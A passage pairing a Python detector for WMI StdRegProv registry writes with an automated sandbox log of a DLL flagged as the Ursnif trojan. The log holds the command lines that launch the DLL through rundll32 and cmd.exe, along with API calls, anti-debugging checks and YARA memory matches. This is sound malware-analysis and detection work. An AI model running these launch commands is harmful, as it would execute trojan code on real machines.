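    "SetBinaryValue", "SetDWORDValue", "SetQWORDValue", "SetStringValue",
    "SetExpandedStringValue", "SetMultiStringValue", "SetSecurityDescriptor",
})

# Images expected to write the registry through StdRegProv in the monitored
# estate. An assumption for this example; tune it per environment, and do not
# add rundll32.exe just because it is a Microsoft binary.
EXPECTED_WMI_REGISTRY_CLIENTS = frozenset({"wmic.exe"})

LOADDLL32 = r"C:\Windows\System32\loaddll32.exe"
RUNDLL32 = r"C:\Windows\SysWOW64\rundll32.exe"


def _event(client_image: str, method: str, namespace: str = r"root\default",
           wmi_class: str = "StdRegProv") -> dict:
    """Constructed event record; the field names are this example's own."""
    return {"client_image": client_image, "namespace": namespace,
            "class": wmi_class, "method": method}


# The seven IWbemServices::ExecMethod calls listed in the report, as records.
REPORT_EVENTS = [
    _event(LOADDLL32, "GetStringValue"),
    _event(LOADDLL32, "SetDWORDValue"),
    _event(LOADDLL32, "SetBinaryValue"),
    _event(LOADDLL32, "SetStringValue"),
    _event(RUNDLL32, "SetDWORDValue"),
    _event(RUNDLL32, "SetBinaryValue"),
    _event(RUNDLL32, "SetStringValue"),
]


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_stdregprov_write(event: dict) -> bool:
    return (event["namespace"].lower() == r"root\default"
            and event["class"].lower() == "stdregprov"
            and event["method"] in STDREGPROV_WRITE_METHODS)


def detect_wmi_registry_writes(events, expected=EXPECTED_WMI_REGISTRY_CLIENTS) -> list:
    """One finding per registry write issued through StdRegProv by an image
    outside the expected set. The client image recorded with the ExecMethod
    call is judged, not the image that registry telemetry would show."""
    findings = []
    for event in events:
        if not is_stdregprov_write(event):
            continue
        image = image_name(event["client_image"])
        if image in expected:
            continue
        findings.append({"image": image, "method": event["method"],
                         "client_image": event["client_image"]})
    return findings


def findings_by_image(findings) -> dict:
    """Per-image count, the shape an alert title or triage summary wants."""
    return dict(Counter(f["image"] for f in findings))


if __name__ == "__main__":
    hits = detect_wmi_registry_writes(REPORT_EVENTS)
    for hit in hits:
        print(f"{hit['image']:<14} StdRegProv::{hit['method']}")
    print(findings_by_image(hits))
```

Run against the report's calls this yields six findings, three each for loaddll32.exe and rundll32.exe, and nothing for the GetStringValue read.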
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E191B9C GetProcAddress, NtCreateSection, memset
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E191EC7 NtMapViewOfSection
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E192485 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E82D06 NtOpenProcess, NtOpenProcessToken, NtQueryInformationToken, NtQueryInformationToken, NtQueryInformationToken, memcpy, NtClose, NtClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E88005 NtQueryVirtualMemory
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E192264
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1EB617
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1F862F
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1ED6B0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1E1727
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1EDC20
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E208CB7
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1F0534
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1F8AA2
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2162C0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1EAB67
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E208B97
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1EE050
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1F8861
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1F917A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E82206
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E87DE0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E83109
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1EB617
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1F862F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1F9653
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1ED6B0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1F8F15
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1E1727
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1EDC20
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E208CB7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1F8CD4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1F0534
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1F8AA2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E2162C0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1EAB67
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E208B97
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1F93EE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1EE050
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1F8861
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1F917A
Source: C:\Windows\System32\loaddll32.exe | Code function: String function: 6E1DE9F0 appears 35 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E1DE9F0 appears 37 times
Source: 3b17.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine | Classification label: mal80.troj.winDLL@18/8@6/1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E8513E CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Temp\~DF411F8F60C26A5FE3.TMP
Source: 3b17.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\internet explorer\iexplore.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing
Source: 3b17.dll | Metadefender: Detection: 22%
Source: 3b17.dll | ReversingLabs: Detection: 55%
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\3b17.dll'
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Seatforce
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Spaceclose
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3b17.dll,Time
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2
                  Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                  Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                  Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                  Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                  Source: 3b17.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 3b17.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 3b17.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 3b17.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 3b17.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 3b17.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 3b17.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                  Source: 3b17.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3b17.dll
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E191F7C LoadLibraryA,GetProcAddress,0_2_6E191F7C
                  Source: 3b17.dllStatic PE information: real checksum: 0xa34b8 should be: 0x9effb
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E192200 push ecx; ret 0_2_6E192209
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E192253 push ecx; ret 0_2_6E192263
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E217583 push ecx; ret 0_2_6E217596
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E87A60 push ecx; ret 3_2_00E87A69
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E87DCF push ecx; ret 3_2_00E87DDF
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E217583 push ecx; ret 3_2_6E217596

                  Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_6E1DE78D
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E191F7C LoadLibraryA,GetProcAddress | 0_2_6E191F7C
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E20227F mov eax, dword ptr fs:[00000030h] | 0_2_6E20227F
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1F2120 mov eax, dword ptr fs:[00000030h] | 0_2_6E1F2120
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E21E801 mov eax, dword ptr fs:[00000030h] | 0_2_6E21E801
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E21E730 mov eax, dword ptr fs:[00000030h] | 0_2_6E21E730
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E21E337 push dword ptr fs:[00000030h] | 0_2_6E21E337
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E20227F mov eax, dword ptr fs:[00000030h] | 3_2_6E20227F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1F2120 mov eax, dword ptr fs:[00000030h] | 3_2_6E1F2120
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E21E801 mov eax, dword ptr fs:[00000030h] | 3_2_6E21E801
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E21E730 mov eax, dword ptr fs:[00000030h] | 3_2_6E21E730
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E21E337 push dword ptr fs:[00000030h] | 3_2_6E21E337
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_6E1DE78D
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1DDFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_6E1DDFF3
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1F18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_6E1F18EF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1DE78D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_6E1DE78D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1DDFF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 3_2_6E1DDFF3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E1F18EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_6E1F18EF
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp | Binary or memory string: Progmanlock